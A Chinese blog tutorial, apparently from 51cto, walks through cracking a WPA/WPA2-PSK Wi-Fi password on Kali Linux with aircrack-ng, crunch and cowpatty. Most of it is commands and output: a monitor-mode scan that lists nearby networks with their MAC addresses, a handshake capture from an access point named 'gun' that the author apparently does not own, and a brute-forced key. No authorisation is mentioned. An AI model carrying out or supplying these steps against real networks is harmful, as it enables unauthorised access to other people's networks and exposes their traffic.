下面以kali linux为例,带大家分别一起学习如何利用Aircrack 和 Cowpatty两种工具进行无线WPA/WPA-PSK的攻击与破解。如果大家是在vmware虚拟机上做破解攻击的话,你们需要先准备一个kali linux能够识别的外置无线网卡,然后再加载进虚拟的攻击机上,因为我是在自己本身的物理机上做的。
详细步骤如下:
Step1:升级 Aircrack-ng
为了更好地识别出无线网络设备以及环境,我们现在先对Airodump-ng的OUI库进行升级,想进入到Aircrack-ng的安装目录下,然后输入一下命令:airodump-ng-oui-update ,然后回车,等待一段时间之后就升级成功了。
Step2:载入无线网卡
在进入kali linux之后,进入图形界面之后,插入之前准备好的USB无线网卡,(我这里用的是MECURY 的300M无线网卡,大家可以上网找一下kali linux系统所支持的网卡芯片类型,只要能识别出就可以)再查看一下无线网卡的载入情况,可以使用一下命令查看:ifconfig -a
如果载入识别成功之后,那么我们接下来便可以激活无线网卡了,输入下面命令便可激活:
ifconfig wlan0 up
其中,up用于启动网卡,这是我们可以再用ifconfg命令确认一下载入启用情况。
Step3:激活网卡至monitor模式,就是我们平时所说的监听模式。
这里要将网卡启动monitor模式,才能抓取无线数据包进行分析破解;我们可以利用aircrack-ng套件里面的airmon-ng工具开启监听模式:airmon-ng start wlan0
root@kali:/opt/mydownload# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2502 NetworkManager
2531 wpa_supplicant
Interface Chipset Driver
wlan0 Atheros AR9565 ath9k - [phy0]
(monitor mode enabled on mon0)
其中,上面的start后面是跟我们即将开启monitor模式的无线网卡设备名。
而,上面的绿色的标记是无线网卡的芯片型号(Atheros AR9565),默认驱动为ath9k,在监听模式下,适配器更改名称为mon0。
Step4:抓取目标信道的无线数据包
开启好,监听模式之后,我们便使用Aircrack-ng套件里面的airodump-ng套件进行无线数据包的抓取,在这一步骤是整个破解过程比较重要的阶段;而其中我们要破解的关键点就是要获取AP与无线客户端的握手数据包(WPA/WPA2 shankhand)报文,然后对报文进行破解,从而提取出密钥,达到破解的木的。
首先,我们在对目的AP的攻击之前,我们要先要对无线网络信道进行探测,以便于确定攻击的目标信道和AP,再进行下一步的针对性的数据包抓取。
这是,我们可以使用下面的命令对信道数据进行侦查:airodump-ng wlan0
airodump-ng 工具是用于获取当前无线网络的概况,包括AP的SSID、MAC地址、工作频道、无线客户端的MAC以及数量等情况,后面跟上的是无线网卡的设备名。
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
B0:D5:9D:3B:B7:84, 2015-09-22 17:26:52, 2015-09-22 17:27:13, 11, 54, WPA2, CCMP,PSK, -91, 4, 0, 0. 0. 0. 0, 29, 瀵..8涓6锛.甯.姣..浠ヨ.,
0C:84:DC:7B:BC:61, 2015-09-22 17:26:27, 2015-09-22 17:27:11, 1, 54, WPA2, CCMP,PSK, -86, 27, 0, 0. 0. 0. 0, 4, mini,
00:87:36:0F:50:2F, 2015-09-22 17:26:27, 2015-09-22 17:27:07, 1, 54, WPA2, CCMP,PSK, -86, 10, 0, 0. 0. 0. 0, 3, kfc,
60:36:DD:DD:D8:59, 2015-09-22 17:26:37, 2015-09-22 17:27:14, 11, 54, WPA2, CCMP,PSK, -85, 15, 0, 0. 0. 0. 0, 3, zwz,
72:54:99:D1:73:D8, 2015-09-22 17:26:28, 2015-09-22 17:27:12, 2, 54, WPA2, CCMP,PSK, -83, 46, 0, 0. 0. 0. 0, 15, DreamBox_D173D8,
00:1F:64:E0:20:E9, 2015-09-22 17:26:27, 2015-09-22 17:27:13, 3, 54, OPN , , , -77, 58, 0, 0. 0. 0. 0, 8, CMCC-WEB,
00:1F:64:E1:20:E9, 2015-09-22 17:26:27, 2015-09-22 17:27:13, 3, 54, WPA2, CCMP, MGT, -77, 62, 0, 0. 0. 0. 0, 4, CMCC,
D4:EE:07:20:0A:5A, 2015-09-22 17:26:27, 2015-09-22 17:27:11, 1, 54, WPA2, CCMP,PSK, -76, 49, 0, 0. 0. 0. 0, 6, WXWiFi,
3A:67:B0:71:FD:1D, 2015-09-22 17:26:30, 2015-09-22 17:27:14, 11, 54, WPA2, CCMP,PSK, -75, 82, 0, 0. 0. 0. 0, 13, LieBaoWiFi819,
2C:D0:5A:FB:B5:28, 2015-09-22 17:26:29, 2015-09-22 17:27:14, 10, 54, WPA2, CCMP,PSK, -69, 65, 37, 0. 0. 0. 0, 24, ...澶х.峰氨缁.浣.,
48:5A:B6:D9:1F:11, 2015-09-22 17:26:29, 2015-09-22 17:27:14, 11, 54, WPA2, CCMP,PSK, -65, 88, 0, 0. 0. 0. 0, 12, 360WiFi-8317,
00:36:76:36:EF:A7, 2015-09-22 17:26:27, 2015-09-22 17:27:13, 6, 54, WPA2, CCMP,PSK, -61, 95, 0, 0. 0. 0. 0, 13, 缁...~..韬,
D2:7E:35:A3:87:2A, 2015-09-22 17:26:30, 2015-09-22 17:27:14, 11, 54, WPA2, CCMP,PSK, -50, 31, 0, 0. 0. 0. 0, 3, gun,
Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
D4:0B:1A:69:34:00, 2015-09-22 17:26:40, 2015-09-22 17:26:40, -90, 8, (not associated) ,
9C:65:B0:0F:9D:3A, 2015-09-22 17:27:01, 2015-09-22 17:27:01, -88, 4, (not associated) ,
60:36:DD:DD:D8:59, 2015-09-22 17:26:52, 2015-09-22 17:26:53, -87, 3, (not associated) ,
48:D2:24:1C:A1:B5, 2015-09-22 17:26:36, 2015-09-22 17:26:36, -85, 1, (not associated) ,
70:72:3C:ED:DE:1D, 2015-09-22 17:26:38, 2015-09-22 17:26:45, -84, 4, 0C:84:DC:7B:BC:61, mini
90:E7:C4:83:7E:66, 2015-09-22 17:26:37, 2015-09-22 17:27:08, -81, 6, 00:87:36:0F:50:2F,
38:BC:1A:21:D0:5B, 2015-09-22 17:26:30, 2015-09-22 17:27:01, -74, 18, 3A:67:B0:71:FD:1D,
BC:85:56:DD:84:54, 2015-09-22 17:27:02, 2015-09-22 17:27:02, -74, 9, (not associated) ,
48:5A:B6:D9:1F:11, 2015-09-22 17:26:55, 2015-09-22 17:27:03, -67, 13, 3A:67:B0:71:FD:1D,
60:D9:A0:A9:51:9C, 2015-09-22 17:26:34, 2015-09-22 17:26:48, -58, 23, 2C:D0:5A:FB:B5:28,
30:C7:AE:A5:F5:02, 2015-09-22 17:26:40, 2015-09-22 17:27:09, -51, 11, 2C:D0:5A:FB:B5:28,
上面是抓去无线环境的一个csv输出报文,可以从上面的信息中,清晰看到BSSID、信道、信道速率、认证方式、ESSID,还有红色部分的分别有station(无线客户端)MAC,packets的个数,BSSID(连接AP的MAC地址),ESSID等信息。
通过上面对无线网络环境的初步探测之后,我们便对其中的目标信道里面的特定AP进行数据包报文的探测分析,如11信道的ESSID为“gun”的AP进行分析。
kaili#airodump-ng -c 11 -w test2 mon0
-c:针对信道号
-w:输出的cap和csv报文名称
mon0:无线适配器的别名
Step5:
kali#aircrack-ng -w /usr/share/metasploit-framework/data/john/wordlists/password.lst test2-01.cap
其中,-w:指定破解的字典文件,test2-01.cap是抓取的无线数据包报文。
# BSSID ESSID Encryption
1 D2:7E:35:A3:87:2A gun WPA (1 handshake)
//表明其中有WPA的握手数据包,可以进行破解
2 48:5A:B6:D9:1F:11 360WiFi-8317 WPA (0 handshake)
3 BC:85:56:DD:84:54 APC201504300012 WPA (0 handshake)
4 2C:D0:5A:FB:B5:28 ????????????澶х??????氨缁?????????????????? WPA (0 handshake)
5 00:36:76:36:EF:A7 缁????????????~???????????????? WPA (0 handshake)
6 D4:EE:07:20:0A:5A WXWiFi WPA (0 handshake)
7 0C:84:DC:7B:BC:61 mini WPA (0 handshake)
8 72:54:99:D1:73:D8 DreamBox_D173D8 WPA (0 handshake)
9 00:1F:64:E0:20:E9 CMCC-WEB None (10.167.160.1)
10 00:1F:64:E1:20:E9 CMCC No data - WEP or WPA
11 00:87:36:0F:50:2F kfc WPA (0 handshake)
12 46:FD:52:FF:15:88 12345 No data - WEP or WPA
13 60:36:DD:DD:D8:59 zwz No data - WEP or WPA
14 F8:2F:A8:B3:84:7D luo WPA (0 handshake)
15 BC:85:56:36:A1:C4 5B204 No data - WEP or WPA
16 66:14:4B:5F:24:E8 Unknown
17 68:94:23:F1:04:73 forgivinglove WPA (0 handshake)
18 66:6D:57:39:AA:2C WPA (0 handshake)
19 00:00:00:00:00:00 WPA (0 handshake)
20 26:DB:30:9C:20:23 Mandy No data - WEP or WPA
21 06:5E:38:95:D3:4B WPA (0 handshake)
22 1C:66:AA:FC:B9:FD ??????跨???????????? No data - WEP or WPA
"wlan crack" 165L,
5687C
1,1 顶端
Index number of target network ? 1
//选择目标网络1
Opening test2-01.cap
Reading packets, please wait...
Aircrack-ng 1.2 beta3
[00:01:38] 50667 keys tested (539.03 k/s)
Current passphrase: zubeneschamali
Master Key : FD 12 2C 9B 67 3C 37 08 B9 79 D3 9E 13 16 E7 BB
B3 E0 F0 66 C9 4A DA C9 C1 D3 19 C2 1E 59 5B A4
Transient Key : FC D7 CC B3 4C 8A E4 F3 EC 1B 84 91 C8 47 88 48
72 CE 62 1A C8 B7 C3 32 E2 86 AB 13 FC CA 12 CE
C0 62 A4 19 C2 E9 99 49 B5 DE 4B 90 83 CB E6 BE
D9 9B 97 68 57 CD BD 53 81 11 8B 2E CF 34 54 99
EAPOL HMAC : 66 55 4C 70 E9 E0 55 BE D7 83 72 64 7F 1C CB 75
Passphrase not in dictionary
//说明当前字典找不到对于的字段匹配到密钥,所以我们可以自己制作一个字典针对破解
root@kali:~/Desktop#crunch 8 8 charset.lst numberic -o test.dic
//制作一个单纯8位数字的字典文件test.dic
Crunch will now generate the following amount of data: 387420489 bytes
369 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 43046721
crunch: 34% completed generating output
crunch: 67% completed generating output
crunch: 99% completed generating output
crunch: 100% completed generating output
root@kali:~/Desktop# cowpatty -f test.dic -r test2-01.cap
mentohust_0.3.4-1_i386.deb test2-01.cap test2-01.kismet.csv test.dic
mentohust_0.3.4-1_i386.zip test2-01.csv test2-01.kismet.netxml 教程重要说明.txt
root@kali:~/Desktop# cowpatty -f test.dic -r test2-01.cap
mentohust_0.3.4-1_i386.deb test2-01.cap test2-01.kismet.csv test.dic
mentohust_0.3.4-1_i386.zip test2-01.csv test2-01.kismet.netxml 教程重要说明.txt
root@kali:~/Desktop# cowpatty -f test.dic -r test2-01.cap -s gun
//使用cowpatty破解加密密钥 -f:破解词典文件 ; -r:无线数据包报文; -s:SSID名称
61,0-1 44%
cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: cccchrrc
key no. 2000: ccccatth
key no. 3000: ccccshca
key no. 4000: ccccesrr
key no. 5000: cccct.ts
key no. 6000: cccclace
key no. 7000: ccchcert
key no. 8000: ccchhlt.
key no. 9000: ccchrrcl
key no. 10000: ccchstsc
key no. 11000: ccchtc.h
key no. 12000: ccch.sha
key no. 13000: ccchl.sr
key no. 14000: cccahh.s
key no. 15000: cccaaehe
key no. 16000: cccarlst
key no. 17000: cccaea..
key no. 18000: cccatthl
key no. 19000: cccalcec
key no. 20000: cccrcrlh
key no. 21000: cccrh.aa
key no. 22000: cccrrher
key no. 23000: cccrssls
key no. 24000: cccrelae
118,1 65%
^[OH^[OHkey no. 35000: cccercc.
key no. 36000: cccesrrl
key no. 37000: ccceet.c
key no. 38000: ccce.hhh
key no. 39000: cccelssa
key no. 40000: ccctc..r
key no. 41000: ccctaahs
key no. 42000: ccctrese
key no. 43000: ccctsl.t
key no. 44000: cccttrh.
key no. 45000: ccct.tsl
key no. 46000: ccc.cclc
//因为破解的难度是随着密钥的设置的密码强度而递增的,所以,成功率也取决与密码的复杂程度,破解也需耗费比较长的时间,需要更多的耐心。
下面是用aircrack-ng破解:
aircrack-ng -w test2.dic test2-01.cap
Aircrack-ng 1.2 beta3
[03:42:41] 7192600 keys tested (639.81 k/s)
KEY FOUND! [ 44448888 ] //经过3:42:41的时间后,终于破解到KEY的ASSCII值为44448888
Master Key : 2C 1D BA 6C 8C A0 12 E0 3B 05 46 C9 59 3E 91 CD
84 DB BC F8 DC EA 1A 8A 2A FB 74 87 2B 20 6C BF
Transient Key : D0 B3 CA 56 6B EA C9 13 69 05 6B FE 7A E4 04 9E
95 16 6A FC E9 4B B6 A2 1C 38 68 77 78 A6 4F 4E
9F B2 F7 8B 86 3F 73 33 AB 4D FA BB 08 2B F8 06
BF 8A B8 BE 66 E5 A2 44 63 41 31 C6 0E 7B 6D 75
EAPOL HMAC : A0 C9 20 87 8E EF D0 34 37 1F 62 DB 0A 57 9C D8
以上便是利用aircrack-ng套件破解WPA/WPA2-PSK无线加密的破解过程,如有疑问请与本人交流,谢谢。
本文出自 “vencent” 博客,请务必保留此出处http://vencent.blog.51cto.com/9848811/1697242
原文地址:http://vencent.blog.51cto.com/9848811/1697242